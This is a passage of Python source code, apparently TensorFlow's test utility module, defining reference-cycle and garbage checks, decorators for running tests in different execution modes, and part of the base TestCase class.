graph[r_id].append(obj_id)
build_ref_graph(r, graph, reprs, blacklist)
reprs[r_id] = describe(r, blacklist)
def find_cycle(el, graph, reprs, path):
"""Finds and prints a single cycle in the dependency graph."""
if el not in graph:
return
for r in graph[el]:
if r in path:
logging.error("Reference cycle sample:")
for p in path + (r,):
logging.error(reprs.get(p, "unknown object " + str(p)))
return True
else:
if find_cycle(r, graph, reprs, path + (r,)):
return True
return False
obj = objects[idx]
graph = {} # referrer ID -> object ID
reprs = {} # object ID -> description
build_ref_graph(obj, graph, reprs, (objects, graph, reprs, get_ignore_reason,
describe, build_ref_graph, find_cycle))
for k in graph:
if find_cycle(k, graph, reprs, ()):
return True
return False
def assert_no_garbage_created(f):
"""Test method decorator to assert that no garbage has been created.
Note that this decorator sets DEBUG_SAVEALL, which in some Python interpreters
cannot be un-set (i.e. will disable garbage collection for any other unit
tests in the same file/shard).
Args:
f: The function to decorate.
Returns:
The decorated function.
"""
def decorator(self, **kwargs):
"""Sets DEBUG_SAVEALL, runs the test, and checks for new garbage."""
# Force-load `distribution_strategy_context` to prevent GC at
# test time when using eager. Remove once b/117329403 is resolved.
tape.distribution_strategy_context.get_strategy()
gc.disable()
previous_debug_flags = gc.get_debug()
gc.set_debug(gc.DEBUG_SAVEALL)
gc.collect()
previous_garbage = len(gc.garbage)
result = f(self, **kwargs)
gc.collect()
new_garbage = len(gc.garbage)
if new_garbage > previous_garbage:
logging.error(
"The decorated test created work for Python's garbage collector, "
"likely due to a reference cycle. New objects in cycle(s):")
for i, obj in enumerate(gc.garbage[previous_garbage:]):
try:
logging.error("Object %d of %d", i,
len(gc.garbage) - previous_garbage)
def _safe_object_str(obj):
return "<%s %d>" % (obj.__class__.__name__, id(obj))
logging.error(" Object type: %s", _safe_object_str(obj))
logging.error(
" Referrer types: %s", ", ".join(
[_safe_object_str(ref) for ref in gc.get_referrers(obj)]))
logging.error(
" Referent types: %s", ", ".join(
[_safe_object_str(ref) for ref in gc.get_referents(obj)]))
logging.error(" Object attribute names: %s", dir(obj))
logging.error(" Object __str__:")
logging.error(obj)
logging.error(" Object __repr__:")
logging.error(repr(obj))
except Exception: # pylint: disable=broad-except
logging.error("(Exception while printing object)")
# When garbage is created, this call can help identify reference cycles,
# which are typically the cause of such garbage.
if new_garbage > previous_garbage:
for i in range(previous_garbage, new_garbage):
if _find_reference_cycle(gc.garbage, i):
break
# This will fail if any garbage has been created, typically because of a
# reference cycle.
self.assertEqual(previous_garbage, new_garbage)
# TODO(allenl): Figure out why this debug flag reset doesn't work. It would
# be nice to be able to decorate arbitrary tests in a large test suite and
# not hold on to every object in other tests.
gc.set_debug(previous_debug_flags)
gc.enable()
return result
return decorator
def _combine_named_parameters(**kwargs):
"""Generate combinations based on its keyword arguments.
Two sets of returned combinations can be concatenated using +. Their product
can be computed using `times()`.
Args:
**kwargs: keyword arguments of form `option=[possibilities, ...]` or
`option=the_only_possibility`.
Returns:
a list of dictionaries for each combination. Keys in the dictionaries are
the keyword argument names. Each key has one value - one of the
corresponding keyword argument values.
"""
if not kwargs:
return [OrderedDict()]
sort_by_key = lambda k: k[0][0]
kwargs = OrderedDict(sorted(kwargs.items(), key=sort_by_key))
first = list(kwargs.items())[0]
rest = dict(list(kwargs.items())[1:])
rest_combined = _combine_named_parameters(**rest)
key = first[0]
values = first[1]
if not isinstance(values, list):
values = [values]
combinations = [
OrderedDict(sorted(list(combined.items()) + [(key, v)], key=sort_by_key))
for v in values
for combined in rest_combined
]
return combinations
def generate_combinations_with_testcase_name(**kwargs):
"""Generate combinations based on its keyword arguments using combine().
This function calls combine() and appends a testcase name to the list of
dictionaries returned. The 'testcase_name' key is a required for named
parameterized tests.
Args:
**kwargs: keyword arguments of form `option=[possibilities, ...]` or
`option=the_only_possibility`.
Returns:
a list of dictionaries for each combination. Keys in the dictionaries are
the keyword argument names. Each key has one value - one of the
corresponding keyword argument values.
"""
combinations = _combine_named_parameters(**kwargs)
named_combinations = []
for combination in combinations:
assert isinstance(combination, OrderedDict)
name = "".join([
"_{}_{}".format("".join(filter(str.isalnum, key)),
"".join(filter(str.isalnum, str(value))))
for key, value in combination.items()
])
named_combinations.append(
OrderedDict(
list(combination.items()) +
[("testcase_name", "_test{}".format(name))]))
return named_combinations
def run_all_in_graph_and_eager_modes(cls):
"""Execute all test methods in the given class with and without eager."""
base_decorator = run_in_graph_and_eager_modes
for name in dir(cls):
if (not name.startswith(unittest.TestLoader.testMethodPrefix) or
name.startswith("testSkipEager") or
name.startswith("test_skip_eager") or
name == "test_session"):
continue
value = getattr(cls, name, None)
if callable(value):
setattr(cls, name, base_decorator(value))
return cls
def build_as_function_and_v1_graph(func=None):
"""Run a test case in v1 graph mode and inside tf.function in eager mode.
WARNING: This decorator can only be used in test cases that statically checks
generated graph. Attempting to evaluate graph or function results via.
session.run() or self.evaluate() will fail.
WARNING: This decorator can only be used for test cases that inherit from
absl.testing.parameterized.TestCase.
Args:
func: Test case function to be decorated.
Returns:
Decorated test case function.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError(
"`run_in_graph_mode_and_function` only supports test methods.")
@parameterized.named_parameters(("_v1_graph", "v1_graph"),
("_function", "function"))
@functools.wraps(f)
def decorated(self, run_mode, *args, **kwargs):
if run_mode == "v1_graph":
with ops.Graph().as_default():
f(self, *args, **kwargs)
elif run_mode == "function":
@def_function.function
def function_in_eager():
f(self, *args, **kwargs)
# Create a new graph for the eagerly executed version of this test for
# better isolation.
graph_for_eager_test = ops.Graph()
with graph_for_eager_test.as_default(), context.eager_mode():
function_in_eager()
ops.dismantle_graph(graph_for_eager_test)
else:
return ValueError("Unknown run mode %s" % run_mode)
return decorated
if func is not None:
return decorator(func)
return decorator
def run_in_graph_and_eager_modes(func=None,
config=None,
use_gpu=True,
reset_test=True,
assert_no_eager_garbage=False):
"""Execute the decorated test with and without enabling eager execution.
This function returns a decorator intended to be applied to test methods in
a `tf.test.TestCase` class. Doing so will cause the contents of the test
method to be executed twice - once normally, and once with eager execution
enabled. This allows unittests to confirm the equivalence between eager
and graph execution (see `tf.compat.v1.enable_eager_execution`).
For example, consider the following unittest:
```python
class MyTests(tf.test.TestCase):
@run_in_graph_and_eager_modes
def test_foo(self):
x = tf.constant([1, 2])
y = tf.constant([3, 4])
z = tf.add(x, y)
self.assertAllEqual([4, 6], self.evaluate(z))
if __name__ == "__main__":
tf.test.main()
```
This test validates that `tf.add()` has the same behavior when computed with
eager execution enabled as it does when constructing a TensorFlow graph and
executing the `z` tensor in a session.
`deprecated_graph_mode_only`, `run_v1_only`, `run_v2_only`, and
`run_in_graph_and_eager_modes` are available decorators for different
v1/v2/eager/graph combinations.
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator the can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
config: An optional config_pb2.ConfigProto to use to configure the session
when executing graphs.
use_gpu: If True, attempt to run as many operations as possible on GPU.
reset_test: If True, tearDown and SetUp the test case between the two
executions of the test (once with and once without eager execution).
assert_no_eager_garbage: If True, sets DEBUG_SAVEALL on the garbage
collector and asserts that no extra garbage has been created when running
the test with eager execution enabled. This will fail if there are
reference cycles (e.g. a = []; a.append(a)). Off by default because some
tests may create garbage for legitimate reasons (e.g. they define a class
which inherits from `object`), and because DEBUG_SAVEALL is sticky in some
Python interpreters (meaning that tests which rely on objects being
collected elsewhere in the unit test file will not work). Additionally,
checks that nothing still has a reference to Tensors that the test
allocated.
Returns:
Returns a decorator that will run the decorated test method twice:
once by constructing and executing a graph in a session and once with
eager execution enabled.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError(
"`run_in_graph_and_eager_modes` only supports test methods. "
"Did you mean to use `run_all_in_graph_and_eager_modes`?")
def decorated(self, *args, **kwargs):
try:
with context.graph_mode():
with self.test_session(use_gpu=use_gpu, config=config):
f(self, *args, **kwargs)
except unittest.case.SkipTest:
pass
def run_eagerly(self, **kwargs):
if not use_gpu:
with ops.device("/device:CPU:0"):
f(self, *args, **kwargs)
else:
f(self, *args, **kwargs)
if assert_no_eager_garbage:
ops.reset_default_graph()
run_eagerly = assert_no_new_tensors(
assert_no_garbage_created(run_eagerly))
if reset_test:
# This decorator runs the wrapped test twice.
# Reset the test environment between runs.
self.tearDown()
self._tempdir = None
# Create a new graph for the eagerly executed version of this test for
# better isolation.
graph_for_eager_test = ops.Graph()
with graph_for_eager_test.as_default(), context.eager_mode():
if reset_test:
self.setUp()
run_eagerly(self, **kwargs)
ops.dismantle_graph(graph_for_eager_test)
return decorated
if func is not None:
return decorator(func)
return decorator
def py_func_if_in_function(f):
def decorated(*args, **kwds):
if not ops.get_default_graph()._building_function:
return f(*args, **kwds)
tensor_args = []
tensor_indices = []
for i, arg in enumerate(args):
if isinstance(arg, (ops.Tensor, variables.Variable)):
tensor_args.append(arg)
tensor_indices.append(i)
def inner_f(*inner_tensor_args):
my_args = list(args)
for i, n in zip(tensor_indices, inner_tensor_args):
my_args[i] = n
return f(*my_args, **kwds)
return script_ops.py_func(inner_f, tensor_args, [])
return tf_decorator.make_decorator(f, decorated)
def also_run_as_tf_function(f):
"""Runs the decorated test twice--once as is, once inside a tf.function.
This allows you to run a test both in eager execution and inside a
tf.function, exercising the two execution modes supported in tf 2.0. The test
assertions are automatically done inside tf.py_funcs, and tf.function ensures
that they run in the proper order and with the proper side effects.
Currently variable creation is not supported in tests annotated with this
decorator since it's tricky to ensure the variable doesn't get repeatedly
created when retracing the tf.function.
Args:
f: the test method to be decorated
Returns:
The decorated test method, which will run both in eager and inside a
tf.function.
"""
def decorated(*args, **kwds):
def bound_f():
f(*args, **kwds)
with context.eager_mode():
# Running in eager mode
bound_f()
# Running as TF function
# TODO(b/121143941): Remove the autograph override.
def_function.function(bound_f, autograph=False)()
return decorated
def deprecated_graph_mode_only(func=None):
"""Execute the decorated test in graph mode.
This function returns a decorator intended to be applied to tests that are not
compatible with eager mode. When this decorator is applied, the test body will
be run in an environment where API calls construct graphs instead of executing
eagerly.
`deprecated_graph_mode_only`, `run_v1_only`, `run_v2_only`, and
`run_in_graph_and_eager_modes` are available decorators for different
v1/v2/eager/graph combinations.
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator the can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will run the decorated test method in graph mode.
"""
def decorator(f):
if tf_inspect.isclass(f):
setup = f.__dict__.get("setUp")
if setup is not None:
setattr(f, "setUp", decorator(setup))
for name, value in f.__dict__.copy().items():
if (callable(value) and
name.startswith(unittest.TestLoader.testMethodPrefix)):
setattr(f, name, decorator(value))
return f
def decorated(self, *args, **kwargs):
if context.executing_eagerly():
with context.graph_mode():
return f(self, *args, **kwargs)
else:
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
run_deprecated_v1 = deprecated_graph_mode_only
def run_all_in_deprecated_graph_mode_only(cls):
"""Execute all tests in a class in graph mode."""
base_decorator = deprecated_graph_mode_only
for name in dir(cls):
if (not name.startswith(unittest.TestLoader.testMethodPrefix) or
name == "test_session"):
continue
value = getattr(cls, name, None)
if callable(value):
setattr(cls, name, base_decorator(value))
return cls
def run_v1_only(reason, func=None):
"""Execute the decorated test only if running in v1 mode.
This function is intended to be applied to tests that exercise v1 only
functionality. If the test is run in v2 mode it will simply be skipped.
`deprecated_graph_mode_only`, `run_v1_only`, `run_v2_only`, and
`run_in_graph_and_eager_modes` are available decorators for different
v1/v2/eager/graph combinations.
Args:
reason: string giving a reason for limiting the test to v1 only.
func: function to be annotated. If `func` is None, this method returns a
decorator the can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will conditionally skip the decorated test method.
"""
if not isinstance(reason, str):
raise ValueError("'reason' should be string, got {}".format(type(reason)))
def decorator(f):
if tf_inspect.isclass(f):
# To skip an entire test suite class, we only decorate the setUp method
# to skip all tests. There are cases when setUp is not defined (not
# overridden in subclasses of TestCase, so not available in f.__dict__
# below). For those cases, we walk the method resolution order list and
# pick the first setUp method we find (usually this should be the one in
# the parent class since that's the TestCase class).
for cls in type.mro(f):
setup = cls.__dict__.get("setUp")
if setup is not None:
setattr(f, "setUp", decorator(setup))
break
return f
else:
# If f is just a function, just create a decorator for it and return it
def decorated(self, *args, **kwargs):
if tf2.enabled():
self.skipTest(reason)
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
def run_v2_only(func=None):
"""Execute the decorated test only if running in v2 mode.
This function is intended to be applied to tests that exercise v2 only
functionality. If the test is run in v1 mode it will simply be skipped.
`deprecated_graph_mode_only`, `run_v1_only`, `run_v2_only`, and
`run_in_graph_and_eager_modes` are available decorators for different
v1/v2/eager/graph combinations.
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator the can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will conditionally skip the decorated test method.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError("`run_v2_only` only supports test methods.")
def decorated(self, *args, **kwargs):
if not tf2.enabled():
self.skipTest("Test is only compatible with v2")
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
def run_gpu_only(func=None):
"""Execute the decorated test only if a GPU is available.
This function is intended to be applied to tests that require the presence
of a GPU. If a GPU is absent, it will simply be skipped.
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator the can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will conditionally skip the decorated test method.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError("`run_gpu_only` only supports test methods.")
def decorated(self, *args, **kwargs):
if not is_gpu_available():
self.skipTest("Test requires GPU")
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
def run_cuda_only(func=None):
"""Execute the decorated test only if a GPU is available.
This function is intended to be applied to tests that require the precense
of a CUDA GPU. If a CUDA GPU is absent, it will simply be skipped.
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator the can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will conditionally skip the decorated test method.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError("`run_cuda_only` only supports test methods.")
def decorated(self, *args, **kwargs):
if not is_gpu_available(cuda_only=True):
self.skipTest("Test requires CUDA GPU")
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
def with_forward_compatibility_horizons(*horizons):
"""Executes the decorated test with the specified forward-compat horizons.
Args:
*horizons: A list of (year, month, day) tuples. If the list includes
`None`, then the test will also be run with no forward-compatibility
horizon set.
Returns:
A decorator that will execute the test with the specified horizons.
"""
if not horizons:
raise ValueError("Expected at least one horizon.")
for horizon in horizons:
if not ((horizon is None) or
(len(horizon) == 3 and all(isinstance(x, int) for x in horizon))):
raise ValueError("Bad horizon value: %r" % horizon)
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError("`with_forward_compatibility_horizons` only "
"supports test methods.")
def decorated(self, *args, **kwargs):
for horizon in horizons:
if horizon is None:
f(self, *args, **kwargs)
else:
(year, month, day) = horizon
with forward_compatibility_horizon(year, month, day):
f(self, *args, **kwargs)
return decorated
return decorator
@deprecation.deprecated(
None, "Use `tf.config.experimental.list_physical_devices('GPU')` instead.")
@tf_export("test.is_gpu_available")
def is_gpu_available(cuda_only=False, min_cuda_compute_capability=None):
"""Returns whether TensorFlow can access a GPU.
Warning: if a non-GPU version of the package is installed, the function would
also return False. Use `tf.test.is_built_with_cuda` to validate if TensorFlow
was build with CUDA support.
Args:
cuda_only: limit the search to CUDA GPUs.
min_cuda_compute_capability: a (major,minor) pair that indicates the minimum
CUDA compute capability required, or None if no requirement.
Note that the keyword arg name "cuda_only" is misleading (since routine will
return true when a GPU device is available irrespective of whether TF was
built with CUDA support or ROCm support. However no changes here because
++ Changing the name "cuda_only" to something more generic would break
backward compatibility
++ Adding an equivalent "rocm_only" would require the implementation check
the build type. This in turn would require doing the same for CUDA and thus
potentially break backward compatibility
++ Adding a new "cuda_or_rocm_only" would not break backward compatibility,
but would require most (if not all) callers to update the call to use
"cuda_or_rocm_only" instead of "cuda_only"
Returns:
True if a GPU device of the requested kind is available.
"""
def compute_capability_from_device_desc(device_desc):
# TODO(jingyue): The device description generator has to be in sync with
# this file. Another option is to put compute capability in
# DeviceAttributes, but I avoided that to keep DeviceAttributes
# target-independent. Reconsider this option when we have more things like
# this to keep in sync.
# LINT.IfChange
match = re.search(r"compute capability: (\d+)\.(\d+)", device_desc)
# LINT.ThenChange(//tensorflow/core/\
# common_runtime/gpu/gpu_device.cc)
if not match:
return 0, 0
return int(match.group(1)), int(match.group(2))
try:
for local_device in device_lib.list_local_devices():
if local_device.device_type == "GPU":
if (min_cuda_compute_capability is None or
compute_capability_from_device_desc(
local_device.physical_device_desc) >=
min_cuda_compute_capability):
return True
if local_device.device_type == "SYCL" and not cuda_only:
return True
return False
except errors_impl.NotFoundError as e:
if not all(x in str(e) for x in ["CUDA", "not find"]):
raise e
else:
logging.error(str(e))
return False
@contextlib.contextmanager
def device(use_gpu):
"""Uses gpu when requested and available."""
if use_gpu and is_gpu_available():
dev = "/device:GPU:0"
else:
dev = "/device:CPU:0"
with ops.device(dev):
yield
@contextlib.contextmanager
def use_gpu():
"""Uses gpu when requested and available."""
with device(use_gpu=True):
yield
@contextlib.contextmanager
def force_gpu():
"""Force the gpu to be used."""
with ops.device("/device:GPU:0"):
yield
@contextlib.contextmanager
def force_cpu():
"""Force the cpu to be used."""
with ops.device("/device:CPU:0"):
yield
class CapturedWrites(object):
"""A utility class to load the captured writes made to a stream."""
def __init__(self, capture_location):
self.capture_location = capture_location
def contents(self):
"""Get the captured writes as a single string."""
with open(self.capture_location) as tmp_file:
output_data = "".join(tmp_file.readlines())
return output_data
class FakeEagerSession(object):
"""Fake session so tests that conditionally use placeholders can use eager.
There are a number of tests that conditionally use placeholders for shape
inference. The pattern is demonstrated here:
```python
with self.cached_session() as sess:
if static_shape:
y = math_ops.matmul(x, ...)
feed_dict = {}
else:
x_ph = array_ops.placeholder(...)
y = math_ops.matmul(x_ph, ...)
feed_dict = {x_ph: x}
val = sess.run(y, feed_dict=feed_dict)
```
Since the feed_dict is empty when not using placeholders we should be able to
call self.evaluate(), however this requires rewriting the test case.
This class should be considered a stop-gap solution to get tests running with
eager with minimal changes to the actual test.
"""
def __init__(self, test_case):
self._test_case = test_case
def run(self, fetches, *args, **kwargs):
"""Evalaute `fetches`.
Fail if additional args are specified.
Args:
fetches: A Tensor or a nested list/tuple of Tensors.
*args: Positional arguments
**kwargs: Keyword arguments
Raises:
RuntimeError: If args or kwargs are specified.
Returns:
Tensors as numpy values.
"""
feed_dict = kwargs.pop("feed_dict", {})
if feed_dict:
raise RuntimeError(
"feed_dict is not supported when eager execution is enabled "
"(in this case, sess.run(t) is shorthand for t.numpy()")
if args or kwargs:
raise RuntimeError(
"Optional args are not supported when eager execution is enabled "
"(in this case, sess.run(t) is shorthand for t.numpy()")
return self._test_case.evaluate(fetches)
class ErrorLoggingSession(session.Session):
"""Wrapper around a Session that logs errors in run()."""
def run(self, *args, **kwargs):
try:
return super(ErrorLoggingSession, self).run(*args, **kwargs)
except Exception as e: # pylint: disable=broad-except
# Note: disable the logging for OutOfRangeError, which makes the output
# of tf.data tests hard to read, because OutOfRangeError is used as the
# signal completion
if not isinstance(e, errors.OutOfRangeError):
logging.error(str(e))
raise
def use_deterministic_cudnn(func):
"""Disable autotuning during the call to this function.
Some tests want to base assertions on a graph being isomorphic with a copy.
To ensure this, this decorator disables autotuning.
Args:
func: Function to run with CUDNN autotuning turned off.
Returns:
Decorated function.
"""
def decorator(f):
def decorated(self, *args, **kwargs):
original_var = os.environ.get("TF_CUDNN_DETERMINISTIC", "")
os.environ["TF_CUDNN_DETERMINISTIC"] = "true"
result = f(self, *args, **kwargs)
os.environ["TF_CUDNN_DETERMINISTIC"] = original_var
return result
return decorated
if func is not None:
return decorator(func)
return decorator
# The description is just for documentation purposes.
def enable_tf_xla_constant_folding(description):
if not isinstance(description, str):
raise ValueError("'description' should be string, got {}".format(
type(description)))
def enable_tf_xla_constant_folding_impl(func):
"""Enable constant folding during the call to this function.
Some tests fail without constant folding.
Args:
func: Function to run with constant folding turned on.
Returns:
Decorated function.
"""
def decorator(f):
def decorated(self, *args, **kwargs):
original_var = pywrap_tensorflow.TF_GetXlaConstantFoldingDisabled()
pywrap_tensorflow.TF_SetXlaConstantFoldingDisabled(False)
result = f(self, *args, **kwargs)
pywrap_tensorflow.TF_SetXlaConstantFoldingDisabled(original_var)
return result
return decorated
if func is not None:
return decorator(func)
return decorator
return enable_tf_xla_constant_folding_impl
# The description is just for documentation purposes.
def disable_xla(description):
def disable_xla_impl(func):
"""Execute the test method only if xla is not enabled."""
def decorator(func):
def decorated(self, *args, **kwargs):
if is_xla_enabled():
return
else:
return func(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
return disable_xla_impl
def for_all_test_methods(decorator, *args, **kwargs):
"""Generate class-level decorator from given method-level decorator.
It is expected for the given decorator to take some arguments and return
a method that is then called on the test method to produce a decorated
method.
Args:
decorator: The decorator to apply.
*args: Positional arguments
**kwargs: Keyword arguments
Returns: Function that will decorate a given classes test methods with the
decorator.
"""
def all_test_methods_impl(cls):
"""Apply decorator to all test methods in class."""
for name in dir(cls):
value = getattr(cls, name)
if callable(value) and name.startswith(
"test") and (name != "test_session"):
setattr(cls, name, decorator(*args, **kwargs)(value))
return cls
return all_test_methods_impl
# The description is just for documentation purposes.
def no_xla_auto_jit(description): # pylint: disable=unused-argument
def no_xla_auto_jit_impl(func):
"""This test is not intended to be run with XLA auto jit enabled."""
def decorator(func):
def decorated(self, *args, **kwargs):
if is_xla_enabled():
# Skip test if using XLA is forced.
return
else:
return func(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
return no_xla_auto_jit_impl
# The description is just for documentation purposes.
def xla_allow_fallback(description): # pylint: disable=unused-argument
def xla_allow_fallback_impl(func):
"""Allow fallback to TF even though testing xla."""
def decorator(func):
def decorated(self, *args, **kwargs):
if is_xla_enabled():
# Update the global XLABuildOpsPassFlags to enable lazy compilation,
# which allows the compiler to fall back to TF classic. Remember the
# old value so that we can reset it.
old_value = pywrap_tensorflow.TF_SetXlaEnableLazyCompilation(True)
result = func(self, *args, **kwargs)
pywrap_tensorflow.TF_SetXlaEnableLazyCompilation(old_value)
return result
else:
return func(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
return xla_allow_fallback_impl
class EagerSessionWarner(object):
def __getattr__(self, attr):
raise AttributeError(
"Trying to access properties or call methods on the result of "
"self.session(), self.cached_session(), etc while eager execution "
"is enabled. If you're porting this test case to TF 2.0, either "
"adapt the test to work with eager execution or insert a call to "
"tf.disable_eager_execution() in the main() function of this test "
"file.")
@tf_export("test.TestCase")
class TensorFlowTestCase(googletest.TestCase):
"""Base class for tests that need to test TensorFlow."""
def __init__(self, methodName="runTest"): # pylint: disable=invalid-name
super(TensorFlowTestCase, self).__init__(methodName)
if is_xla_enabled():
pywrap_tensorflow.TF_SetXlaAutoJitMode("2")
pywrap_tensorflow.TF_SetXlaMinClusterSize(1)
pywrap_tensorflow.TF_SetXlaEnableLazyCompilation(False)
pywrap_tensorflow.TF_SetTfXlaCpuGlobalJit(True)
# Constant folding secretly runs code on TF:Classic CPU, so we also
# disable it here.
pywrap_tensorflow.TF_SetXlaConstantFoldingDisabled(True)
self._threads = []
self._tempdir = None
self._cached_session = None
def setUp(self):
self._ClearCachedSession()
random.seed(random_seed.DEFAULT_GRAPH_SEED)
np.random.seed(random_seed.DEFAULT_GRAPH_SEED)
# Note: The following line is necessary because some test methods may error
# out from within nested graph contexts (e.g., via assertRaises and
# assertRaisesRegexp), which may leave ops._default_graph_stack non-empty
# under certain versions of Python. That would cause
# ops.reset_default_graph() to throw an exception if the stack were not
# cleared first.
ops._default_graph_stack.reset() # pylint: disable=protected-access
ops.reset_default_graph()
random_seed.set_random_seed(random_seed.DEFAULT_GRAPH_SEED)
# Reset summary writer in case another test used set_as_default() with their
# summary writer.
summary_state = summary_ops_v2._summary_state # pylint: disable=protected-access
summary_state.writer = None
# Avoiding calling setUp() for the poorly named test_session method.
if self.id().endswith(".test_session"):
self.skipTest("Not a test.")
def tearDown(self):
for thread in self._threads:
thread.check_termination()
self._ClearCachedSession()
def _ClearCachedSession(self):
if self._cached_session is not None:
self._cached_session.close()
self._cached_session = None
def get_temp_dir(self):
"""Returns a unique temporary directory for the test to use.
If you call this method multiple times during in a test, it will return the
same folder. However, across different runs the directories will be
different. This will ensure that across different runs tests will not be
able to pollute each others environment.
If you need multiple unique directories within a single test, you should
use tempfile.mkdtemp as follows:
tempfile.mkdtemp(dir=self.get_temp_dir()):
Returns:
string, the path to the unique temporary directory created for this test.
"""
if not self._tempdir:
self._tempdir = tempfile.mkdtemp(dir=googletest.GetTempDir())
return self._tempdir
@contextlib.contextmanager
def captureWritesToStream(self, stream):
"""A context manager that captures the writes to a given stream.
This context manager captures all writes to a given stream inside of a
`CapturedWrites` object. When this context manager is created, it yields
the `CapturedWrites` object. The captured contents can be accessed by
calling `.contents()` on the `CapturedWrites`.
For this function to work, the stream must have a file descriptor that
can be modified using `os.dup` and `os.dup2`, and the stream must support
a `.flush()` method. The default python sys.stdout and sys.stderr are
examples of this. Note that this does not work in Colab or Jupyter
notebooks, because those use alternate stdout streams.
Example:
```python
class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
input = [1.0, 2.0, 3.0, 4.0, 5.0]
with self.captureWritesToStream(sys.stdout) as captured:
result = MyOperator(input).eval()
self.assertStartsWith(captured.contents(), "This was printed.")
```
Args:
stream: The stream whose writes should be captured. This stream must have
a file descriptor, support writing via using that file descriptor, and
must have a `.flush()` method.
Yields:
A `CapturedWrites` object that contains all writes to the specified stream
made during this context.
"""
stream.flush()
fd = stream.fileno()
tmp_file_path = tempfile.mktemp(dir=self.get_temp_dir())
tmp_file = open(tmp_file_path, "w")
orig_fd = os.dup(fd)
os.dup2(tmp_file.fileno(), fd)
try:
yield CapturedWrites(tmp_file_path)
finally:
tmp_file.close()
os.dup2(orig_fd, fd)
def _AssertProtoEquals(self, a, b, msg=None):
"""Asserts that a and b are the same proto.
Uses ProtoEq() first, as it returns correct results
for floating point attributes, and then use assertProtoEqual()
in case of failure as it provides good error messages.
Args:
a: a proto.
b: another proto.
msg: Optional message to report on failure.
"""
if not compare.ProtoEq(a, b):
compare.assertProtoEqual(self, a, b, normalize_numbers=True, msg=msg)
def assertProtoEquals(self, expected_message_maybe_ascii, message, msg=None):
"""Asserts that message is same as parsed expected_message_ascii.
Creates another prototype of message, reads the ascii message into it and
then compares them using self._AssertProtoEqual().
Args:
expected_message_maybe_ascii: proto message in original or ascii form.
message: the message to validate.
msg: Optional message to report on failure.
"""
msg = msg if msg else ""
if isinstance(expected_message_maybe_ascii, type(message)):
expected_message = expected_message_maybe_ascii
self._AssertProtoEquals(expected_message, message)
elif isinstance(expected_message_maybe_ascii, str):
expected_message = type(message)()
text_format.Merge(
expected_message_maybe_ascii,
expected_message,
descriptor_pool=descriptor_pool.Default())
self._AssertProtoEquals(expected_message, message, msg=msg)
else:
assert False, ("Can't compare protos of type %s and %s. %s" %
(type(expected_message_maybe_ascii), type(message), msg))
def assertProtoEqualsVersion(
self,
expected,
actual,
producer=versions.GRAPH_DEF_VERSION,
min_consumer=versions.GRAPH_DEF_VERSION_MIN_CONSUMER,
msg=None):
expected = "versions { producer: %d min_consumer: %d };\n%s" % (
producer, min_consumer, expected)
self.assertProtoEquals(expected, actual, msg=msg)
def assertStartsWith(self, actual, expected_start, msg=None):
"""Assert that actual.startswith(expected_start) is True.
Args:
actual: str
expected_start: str
msg: Optional message to report on failure.
"""
if not actual.startswith(expected_start):
fail_msg = "%r does not start with %r" % (actual, expected_start)
fail_msg += " : %r" % (msg) if msg else ""
self.fail(fail_msg)
def _eval_tensor(self, tensor):
if tensor is None:
return None
elif callable(tensor):
return self._eval_helper(tensor())
else:
try:
if sparse_tensor.is_sparse(tensor):
return sparse_tensor.SparseTensorValue(tensor.indices.numpy(),
tensor.values.numpy(),
tensor.dense_shape.numpy())
elif ragged_tensor.is_ragged(tensor):
return ragged_tensor_value.RaggedTensorValue(
self._eval_tensor(tensor.values),
self._eval_tensor(tensor.row_splits))
elif isinstance(tensor, ops.IndexedSlices):
return ops.IndexedSlicesValue(
values=tensor.values.numpy(),
indices=tensor.indices.numpy(),
dense_shape=tensor.dense_shape.numpy())
return tensor.numpy()
except AttributeError as e:
six.raise_from(ValueError("Unsupported type %s." % type(tensor)), e)
def _eval_helper(self, tensors):
if tensors is None:
return None
return nest.map_structure(self._eval_tensor, tensors)
def evaluate(self, tensors):
"""Evaluates tensors and returns numpy values.
Args:
tensors: A Tensor or a nested list/tuple of Tensors.
Returns:
tensors numpy values.
"""
if context.executing_eagerly():
return self._eval_helper(tensors)
else:
sess = ops.get_default_session()
if sess is None:
with self.test_session() as sess:
return sess.run(tensors)
else:
return sess.run(tensors)
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def session(self, graph=None, config=None, use_gpu=False, force_gpu=False):
"""Returns a TensorFlow Session for use in executing tests.
Note that this will set this session and the graph as global defaults.
Use the `use_gpu` and `force_gpu` options to control where ops are run. If
`force_gpu` is True, all ops are pinned to `/device:GPU:0`. Otherwise, if
`use_gpu` is True, TensorFlow tries to run as many ops on the GPU as
possible. If both `force_gpu and `use_gpu` are False, all ops are pinned to
the CPU.
Example:
``` python
class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
with self.session(use_gpu=True):
valid_input = [1.0, 2.0, 3.0, 4.0, 5.0]
